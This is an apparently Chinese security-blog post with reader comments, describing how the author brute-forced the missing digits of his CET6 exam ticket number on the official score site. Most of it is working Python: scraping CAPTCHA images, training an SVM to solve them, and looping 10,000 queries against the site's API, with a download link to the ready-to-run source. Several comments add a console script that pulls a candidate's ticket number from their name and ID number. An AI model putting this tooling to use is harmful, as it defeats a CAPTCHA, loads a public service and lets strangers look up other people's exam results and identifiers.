六级成绩查询无准考证

六级成绩查询无准考证
FB招聘站
分类阅读
专栏
公开课
FIT 2019
企业服务
用户服务
搜索
投稿
登录
注册
没有准考证号我是如何暴力查询英语六级成绩的 FlashYo2017-08-24现金奖励共971371人围观，发现 49 个不明物体数据安全
* 本文作者：FlashYo，本文属FreeBuf原创奖励计划，未经许可禁止转载

8月22日上午9时，CET6级成绩开始查询了。然而，忘记自己准考证号的也不在少数，而我，非常幸运，成为其中一员。仔细想了想，自己的准考证号是不太可能找回来了。

1. 下载CET6准考证的网站关了，虽然Chrome还保存着账号密码，但没用

2. 准考证本来拍照保存了的，但因为刷机手机图片也丢失了

3. CET6准考证的打印PDF不知道还在不在电脑上，用Everything搜索*.pdf，没有发现在6月17日（那天CET6考试）左右的可疑文件

4. 考场号及座位号完全忘记，另外考场内好像也没熟人

5. 网上的99宿舍这次没用了，无法找回准考证号，只能获取前10位

6. 截止当日，说好的支付宝免准考证号查询成绩并没有来

显然，正常渠道，我是不太可能获取到自己的准考证号了。要等到学校下发6级的成绩单或者班级的成绩单，我估计没半个月是见不到成绩了，甚至更久！

与其等那么久，不如想想有什么办法。

15034181812501.png!small

准考证的前10位，毫无疑问，我们知道。那么需要解决的也就是后面的5位了。即使是暴力猜测，也不过10000次。

CET6成绩查询的网站是http://cet.neea.edu.cn/cet/，查询流程很简单，输入准考证号、姓名、验证码即可。

通过抓包，我们获取了如下几个API：

1. 获取验证码图片URL API
HTTP方式 URL
GET http://cache.neea.edu.cn/Imgs.do?ik={准考证号}&t=0.6002525141319914
返回的内容：

result.imgs("http://cet.neea.edu.cn/imgs/b3d0c1b6987e4295b01e30ccaceed725.png");
通过正则表达式，提取出图片URL即可。

提示：调用该api记得发送GET请求时需要加上相应的cookie。

2. 提交查询API
HTTP方式 URL
POST http://cache.neea.edu.cn/cet/query
提交的内容：

data=CET6_171_DANGCI%2C准考证号%2C姓名&v=验证码
解码一下：

data:CET6_171_DANGCI,准考证号,姓名
v:6wbn
提示：该api提交记得带上相应的cookie

现在，CET暴力查询的整体思路，体现在如下几个模块：

A. 图片获取模块
1. 获取随机的准考证号
2. 获取相应的图片文件

大概获取200张左右图片，之后进行人工图片标记

B. 机器学习模块
1. 标记好下载的验证码图片
2. 图片灰度化、二值化、图片切割
3. 图片转特征矩阵，准备好特征向量与分类标签
4. SVM分类算法进行分类

C. 暴力查询模块
1. 根据输入的前10为准考证号，暴力破解后5为准考证号（考场号3位 + 座位号2位）
2. 指定准考证号ID获取指定验证码图片
3. 图片输入机器学习模块，获取验证码值
4. 提交验证码进行查询，获取相应的结果：验证码错误/无结果/非上述两者，查询成功

难点在于如何对验证码进行识别。

1. 我们先下载好200张左右的验证码图片

通过第一个API接口，编码文件如下所示：

get_images.py

# coding: utf-8
import re
import requests
from settings import img_api_headers, image_api
def get_random_id():
"""获取随机的准考证号"""
return "360450171200100"
def get_image_url_and_filename(text):
"""获取api返回的图片地址"""
url = re.findall(r"imgs$\"(.*?)\"$",text)
name = re.findall(r"imgs/(.*?\.png)",text)
if url:
r = url[0]
else:
raise ValueError
return r, name[0]
def save_url_image_to_file(url, filename):
"""请求图片url，并保存至指定文件"""
r = requests.get(url)
with open("images/" +filename, "wb") as f:
f.write(r.content)
def main():
for i in range(200):
ik = get_random_id()
u = image_api.format(id=ik)
r = requests.get(u, headers=img_api_headers)
url, filename =get_image_url_and_filename(r.text)
save_url_image_to_file(url, filename)
if __name__ == '__main__':
main()
运行上述文件，我们获得了足够多的图片，然后需要做的是手工对图片进行重命名，文件名为验证码的值。

QQ截图20170823004712.png

2. 标记好图片之后，我们再写一个python文件将图片进行切割，将切割后的图片放置在以标签命名的文件夹下。

classify_images.py

# coding: utf-8
"""
1. 切割标记好的图片
2. 将切割的图片分类保存至指定文件夹
"""

import os
from PIL import Image
from utils import do_image_crop

classify_dir = "predict_images"

def classify_croped_image_to_folder(img_list, img_name):
"""通过文件名将块图片存储至指定文件夹"""
for n, word in enumerate(img_name[:4]):
file_dir = os.path.join(classify_dir, word)
if not os.path.exists(file_dir):
os.mkdir(file_dir)

img_list[n].save(os.path.join(classify_dir,word, img_name))

def main():
name_list = os.listdir(classify_dir)
for name in name_list:
if not name.endswith(".png"):
continue
img = Image.open(os.path.join(classify_dir,name))
piece_img_list =do_image_crop(img.copy())
classify_croped_image_to_folder(piece_img_list, name)

if __name__ == '__main__':
main()
运行好后，图片文件就自动分好类了。

QQ截图20170823004415.png

3. 有了分好类的图片，我们需要做的是将图片转换为相应的特征矩阵和对应的分类标签。我们写一个learn_images.py完成这个任务。
learn_images.py

# coding: utf-8
"""
labeled_images文件夹中：
1. 包含的文件夹名为标记名
2. 标记名下的文件夹中包含了学习图片
"""
import os
from sklearn import svm
from PIL import Image
from numpy import array
from utils import *

clf = None

def get_image_fit_data(dir_name):
"""读取labeled_images文件夹的图片，返回图片的特征矩阵及相应标记"""
X = []
Y = []
name_list = os.listdir(dir_name)
for name in name_list:
if not os.path.isdir(os.path.join(dir_name,name)):
continue
image_files = os.listdir(os.path.join(dir_name,name))
for img in image_files:
i =Image.open(os.path.join(dir_name, name, img))
X.append(array(i).flatten())
Y.append(name)

return X, Y

def get_classifier_from_learn():
"""学习数据获取分类器"""
global clf
if not clf:
clf = svm.SVC()
X, Y = get_image_fit_data("labeled_images")
clf.fit(X, Y)
return clf

def main():
clf = get_classifier_from_learn()
print(clf)
PX, PY = get_image_fit_data("predict_images")
for x, y in zip(PX, PY):
r = clf.predict(x.reshape(1, -1))
print(r, y)

if __name__ == '__main__':
main()
运行该文件，我们可以对标记好的图片文件进行预测，在predict_images下的文件，然后会打印出预测值与正确的标记值。

4. 为了方便使用，我们写了一个api接口文件，方便后续的直接调用。
validate_api.py

#coding: utf-8
import requests
from PIL import Image
from io import BytesIO
from learn_images import get_classifier_from_learn
from utils import *

def get_validate_code_from_image(img):
img_piece = do_image_crop(img)
X = img_list_to_array_list(img_piece)
clf = get_classifier_from_learn()
y = clf.predict(X)
return "".join(y)

if __name__ == '__main__':
r = requests.get("http://cet.neea.edu.cn/imgs/1b350fc9f7ab4177aebf82fca2311a11.png")
img = Image.open(BytesIO(r.content))
code =get_validate_code_from_image(img)
print(code)
有了上述的各大文件，我们就可以进行整合工作了。

5. 最后的暴力破解模块了。
force_query.py

# coding: utf-8
"""
暴力查询模块
1. 根据输入的前10为准考证号，暴力破解后5为准考证号（考场号3位 + 座位号2位）
2. 指定准考证号ID获取指定验证码图片
3. 图片输入机器学习模块，获取验证码值
4. 提交验证码进行查询，获取相应的结果：验证码错误/无结果/非上述两者，查询成功

准考证号列表

a. 获取验证码
b. 提交查询请求
如果成功：结束
如果验证码错误：重新获取验证码并提交
如果查询结果为空：生成新的准考证号并提交

"""
import requests
from PIL import Image
from io import BytesIO
from get_images import get_image_url_and_filename
from settings import image_api, query_api, img_api_headers, query_api_headers
from validate_api import get_validate_code_from_image

myid = "你的准考证号前10位{id:05d}"
name = "你的名字"

def log_info(*args):
print("日志：", *args)

def send_query_until_true(num):
# 生成准考证号
new_id = myid.format(id=num)
# 获取验证码图片地址
img_api_url = image_api.format(id=new_id)
img_api_resp =requests.get(img_api_url, headers=img_api_headers)
img_url, filename =get_image_url_and_filename(img_api_resp.text)
# 获取验证码图片并猜测
img_resp = requests.get(img_url)
code =get_validate_code_from_image(Image.open(BytesIO(img_resp.content)))
# 执行查询操作
data = {
"data": "CET6_171_DANGCI,{id},{name}".format(id=new_id,name=name),
"v": code
}
log_info(data)
query_resp = requests.post(query_api,data=data, headers=query_api_headers)
query_text = query_resp.text
log_info(query_text)

if "验证码错误" in query_text:
query_text =send_query_until_true(num)
return query_text

def main():
for num in range(1, 10001):
query_text =send_query_until_true(num)

if "您查询的结果为空" in query_text:
continue
else:
print("后五位是：", num)
break

if __name__ == '__main__':
main()
使用只需要修改id变量为你中的准考证号前10位数字，并将name变量改为你自己的名字，程序就可以一步步向正确的准考证号逼近了。

程序停止了有2种情况：

1. 报错了

2. 查到了

报错了后，将开始的range(1, 10001)改下，为报错结束最后验证的值，节约下次查询的时间。

运气好，大概10分钟内就可以得到了。当我查询到了6级分数，我已做好了下一次6级报名的准备，祝你们好运！附上我的一张成功截图：

InkedQQ截图20170822192846_LI~1.jpg

由于时间原因，程序写得仓促，还有较多的较大的改进空间，例如可以改为多线程或者协程加快查询速率，单线程毕竟太慢了。

不过，估计这东西出来感觉离和谐也不远了。两点原因：

1. 对服务器会造成点压力

2. 只需要知道某个人的姓名与他所在的大学就可以查询到他相应的分数

对了，我还想所说的是，这个网站的验证码设计真的很人性化，你运行一下附件中的count_word.py就知道了！

有些代码，文章中并没有贴上来，如utils.py文件，因为和要叙述的关联性不强。另外，文章可能有些细节没有照顾到，结合附件的源代码，你就明白了。

软件源码附件（可直接使用）：链接：http://pan.baidu.com/s/1i4XwGrb 密码：9qta

* 本文作者：FlashYo，本文属FreeBuf原创奖励计划，未经许可禁止转载

FlashYo
FlashYo
1 篇文章
等级： 1级
||
上一篇：假勒索真愤青：永久摧毁文件的israbye病毒分析下一篇：大数据时代下的隐私保护
这些评论亮了

常运 (6级)c4td0g, 信安从业者，信安爱好者。（各位爷，轻点喷）,...回复
验证码啪啪啪打脸：http://www.chsi.com.cn/cet/query?zkzh=准考证号&xm=你的姓名
很明显的捷径不走，这水平考上6级才怪。
)82(亮了

考试院网站管理员回复
你的六级不会过了，查了日志，明年update你的成绩
)25(亮了

litao3rd (1级)回复
楼上某些大神你们厉害，有必要去打脸吗？楼主的方法虽然复杂了点，但是一来有能力动手，二来也提供了一些思路，你们就呵呵了
)20(亮了

governormars (1级)回复
这不就是爆破吗？人家没验证码的直接用burpsuite跑，还写脚本。。。搞得自己很牛逼，早就这么干了也没像你一样水经验装逼。
)19(亮了

熊骃陟 (1级)回复
兄弟，有这水平还考什么6级
)16(亮了
发表评论已有 49 条评论

熊骃陟 (1级) 2017-08-24回复 1楼
兄弟，有这水平还考什么6级

亮了(16)

Windy 2017-08-24回复 2楼
(

function(d, s) {

d.body.appendChild(s = d.createElement(‘script’)).src = ‘http://code.jquery.com/jquery-1.9.1.min.js’

})(document);

var url = "http://app.cet.edu.cn:7066/baas/app/setuser.do?method=UserVerify";

var ks_data = {

"ks_xm": "",

"ks_sfz": "",

"jb": "2"

};

var postdata = {

"action": "",

"params": JSON.stringify(ks_data)

};

$.post(url = url, data = postdata, callback = function(data) {

data = $.parseJSON(data)

console.log(data["ks_bh"])

})

控制台运行。。。

亮了(4)

hjkl 2017-08-24回复
@ Windy 怎么用？详细说说呗

亮了(0)

Windy 2017-08-25回复
@ hjkl http://app.cet.edu.cn:7066/baas/app/setuser.do?method=UserVerify 打开这个页面，f12控制台运行，"ks_xm": "", 姓名

"ks_sfz": "",身份证

"jb": "2"六级是2，四级是1。

运行，得到考号

亮了(2)

小老鼠上灯台 (1级) 2018-08-23回复
@ Windy 现在好像是用不了啦？？

亮了(0)

fdgfdfg 2017-08-24回复 3楼
417。。悲剧差几分

亮了(1)

谷杨 2017-08-27回复
@ fdgfdfg可不可以帮我查一下啊

亮了(0)

考试院网站管理员 2017-08-24回复 4楼
你的六级不会过了，查了日志，明年update你的成绩

亮了(25)

常运专栏作者(6级) c4td0g, 信安从业者，信安爱好者。（各位爷，轻点喷）,... 2017-08-24回复 5楼
验证码啪啪啪打脸：http://www.chsi.com.cn/cet/query?zkzh=准考证号&xm=你的姓名

很明显的捷径不走，这水平考上6级才怪。

亮了(82)

Y 2017-08-25回复
@ 常运你可以试试直接这样能不能出东西，反正我没有试成功过

亮了(0)

常运专栏作者(6级) c4td0g, 信安从业者，信安爱好者。（各位爷，轻点喷）,... 2017-08-30回复
@ Y 写代码不过关怪谁，不出怪谁

亮了(0)

lcuops 2017-08-24回复 6楼
没有被封ip运气倒是蛮好的

亮了(1)

猜忌 2017-08-24回复 7楼
虽然我看不懂但是感觉好牛逼得样子

亮了(0)

alexnevsky (1级) 以为自己很吊，其实还是菜鸟 2017-08-24回复 8楼
这种查询不会有压力的，小伙子

亮了(4)

0.0 2017-08-24回复 9楼
嗯，6级裸过了。

当天手里没有验证码，正准备写个脚本爆破一下。群里就发了一个学校查准考证的网站(本来是给那些准考证丢了的同学打印准考证用的)。然后写脚本的理由就没有了。

亮了(1)

0.0 2017-08-24回复
@ 0.0 啥子验证码，呸呸呸，准考证

亮了(2)

azxc 2017-08-24回复 10楼
手机上cet官方软件抓个包就有准考证了的说

亮了(2)

hjkl 2017-08-24回复
@ azxc 求教程

亮了(0)

哈啊 2017-08-24回复
@ azxc 怎么操作？求详解

亮了(0)

~。~ 2017-08-25回复
@ azxc 大神，技术渣求给查个准考证号啊。

亮了(0)

kid 2017-08-24回复 11楼
@ 常运我印象中这个网站当天卡的不行

亮了(0)

zw97073966 (4级) python是世界上最好的语言---0x024 2017-08-24回复 12楼
对不起我CET4考了544 ！这个就用不到了，因为CET6与我无关

亮了(0)

fr336uf (2级) 2017-08-25回复 13楼
怪不得那天查询结果好久都不现实，原来是你在捣蛋

亮了(2)

governormars (1级) 2017-08-25回复 14楼
这不就是爆破吗？人家没验证码的直接用burpsuite跑，还写脚本。。。搞得自己很牛逼，早就这么干了也没像你一样水经验装逼。

亮了(19)

煤炭 (1级) 2017-08-25回复 15楼
虽然我看不懂是什么意思，但是感觉你有点装逼过头的样子！

亮了(3)

基围虾_21 2017-08-25回复 16楼
二级两次都没过[doge]

亮了(1)

litao3rd (1级) 2017-08-25回复 17楼
楼上某些大神你们厉害，有必要去打脸吗？楼主的方法虽然复杂了点，但是一来有能力动手，二来也提供了一些思路，你们就呵呵了

亮了(20)

大牛 2017-08-25回复 18楼
当程序员的料，但不是黑客的命。。

亮了(0)

卿伟伟伟 2017-08-25回复 19楼
大一四级一次裸考过[污]

亮了(0)

天黑了以后还会亮吗 2017-08-25回复 20楼
技术宅拯救世界[笑cry][笑cry][笑cry]

亮了(0)

剁碎的肉末 2017-08-25回复 21楼
厉害了

亮了(0)

新垣结衣Best 2017-08-25回复 22楼
不会用[允悲]差点以为自己抓到了救命稻草

亮了(0)

真的好想你们啊 2017-08-25回复 23楼
技术渣不会用啊[二哈]

亮了(1)

树莓派11 2017-08-25回复 24楼
[笑cry]我也写过，程序没跑完学校就给准考证号了[允悲]

亮了(0)

国安部内勤黑客 2017-08-25回复 25楼
六级差35分，我已经很满意了[doge]

亮了(0)

rootkit 2017-08-26回复 26楼
直接到学校服务器里找找不就好了。。

亮了(0)

小白飘过 2017-08-27回复 27楼
@ 常运刷上十几次就需要验证码了，有时候换ip也没用

亮了(0)

swaggyang 2017-08-27回复 28楼
可不可以帮我查一下啊

亮了(0)

zz709196484 (1级) 2017-08-27回复 29楼
老哥你这个ide 用的是哪个？

亮了(0)

吴顺17420 2017-08-29回复 30楼
可不可以帮我查下，或者教我怎么用

亮了(0)

氮气社社长 2017-08-30回复 31楼
没懂[允悲]

亮了(0)

手艺人 (1级) 2017-09-26回复 32楼
这个ML 训练的太简单了正确率不高吧

亮了(1)

瓜瓜 2017-10-26回复 33楼
@ 常运这个网站的验证码更复杂啊

亮了(0)

Arcobaleno (1级) 2018-02-27回复 34楼
链接挂了，我还想看下utils.py怎么写的，能更新下链接吗？

亮了(0)

FlashYo (1级) @WeChat ID：j1208848083 2018-02-27回复
链接：https://pan.baidu.com/s/1eTh2MpO 密码：t7sw

亮了(3)

Arcobaleno (1级) 2018-02-28回复
@ FlashYo 谢谢，非常感激

亮了(0)

发生大幅度斯蒂芬 (1级) 2018-02-28回复 35楼
你好，请问17年12月的四六级成绩可以用以上的文件来查询吗？我查不到准考证号，可以照搬以上的文件来查询准考证吗？

亮了(2)

vishva (1级) 2018-08-22回复 36楼
@ 常运人家轮子造出来了,思路也写出来了,你除了打嘴炮还会干嘛?

亮了(0)

vishva (1级) 2018-08-22回复 37楼
@ governormars 会用别人现成的轮子很nb? 还有人家分享一下思路怎么就成装逼了?

亮了(0)
昵称
请输入昵称
必须您当前尚未登录。登陆？注册邮箱
请输入邮箱地址
必须（保密）表情插图
有人回复时邮件通知我
FlashYo
FlashYo

@WeChat ID：j1208848083

1
文章数
2
评论数
最近文章
没有准考证号我是如何暴力查询英语六级成绩的
2017.08.24

浏览更多
相关阅读
沙盒游戏《我的世界》惊现仿冒游戏下载器如何将SQLServer 2000链接服务器的密码破解为明文技术讨论 | 信息外带漏洞(OOB)利用技巧“瘦男孩”（Lanker-Boy）木马分析报告WannaCry勒索病毒数据恢复指引
特别推荐

关注我们分享每日精选文章

活动预告
11月

FreeBuf精品公开课·双11学习狂欢节 | 给努力的你打打气
已结束
10月

【16课时-连载中】挖掘CVE不是梦（系列课程2）
已结束
10月

【首节课仅需1元】挖掘CVE不是梦
已结束
9月

六级成绩查询无准考证

文章评论